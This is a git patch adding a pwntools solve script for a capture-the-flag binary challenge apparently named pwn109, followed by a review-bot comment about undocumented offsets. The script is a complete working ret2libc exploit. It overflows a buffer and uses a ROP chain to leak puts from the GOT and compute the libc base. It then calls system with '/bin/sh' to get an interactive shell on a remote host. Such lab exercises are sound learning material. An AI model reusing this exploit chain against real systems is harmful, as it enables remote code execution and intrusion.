From ecb666932f4cac8797d3026a07c6ba0a8fb4173c Mon Sep 17 00:00:00 2001
From: jc
Date: Tue, 29 Oct 2024 20:12:25 +0300
Subject: [PATCH] solve script

---
 thm_pwn101/pwn109/a.py | 41 +++++++++++++++++++++++++++++++++++++++++
 1 file changed, 41 insertions(+)
 create mode 100644 thm_pwn101/pwn109/a.py

diff --git a/thm_pwn101/pwn109/a.py b/thm_pwn101/pwn109/a.py
new file mode 100644
index 0000000..51a746e
--- /dev/null
+++ b/thm_pwn101/pwn109/a.py
@@ -0,0 +1,41 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./pwn109", checksec=False)
+# r = process()
+r = remote("10.10.42.182", 9009)
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = 0x4012a3
+
+# buf
+buf = b"A"*40
+buf += p64(pop_rdi)
+buf += p64(target.got.puts)
+buf += p64(target.sym.puts)
+buf += p64(target.sym.main)
+s(buf)
+
+# leak
+r.recvuntil(b"This time")
+r.recvline()
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc = puts - 0x80aa0
+log.info("libc: %#x", libc)
+system = libc + 0x4f550
+sh = libc + 0x1b3e1a
+
+# pop
+buf = b"A"*40
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
\ No newline at end of file
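Review bot: The constants in the leak section (`libc = puts - 0x80aa0`, `system = libc + 0x4f550`, `sh = libc + 0x1b3e1a`) and `pop_rdi = 0x4012a3` are bare magic numbers with no comment recording which libc build and which binary they were measured against, so a reader cannot tell when the script is valid or has silently gone stale. A one-line comment above `libc = puts - 0x80aa0` such as `# offsets measured against the challenge libc: <LIBC_BUILD_ID placeholder>` and a similar note above `pop_rdi` would document that provenance. The `r.recv(6)` leak read is also unchecked: if fewer than six bytes arrive, `u64` of the padded value is a wrong address rather than an error, which is worth at least a comment stating the assumption. The file also lacks a trailing newline.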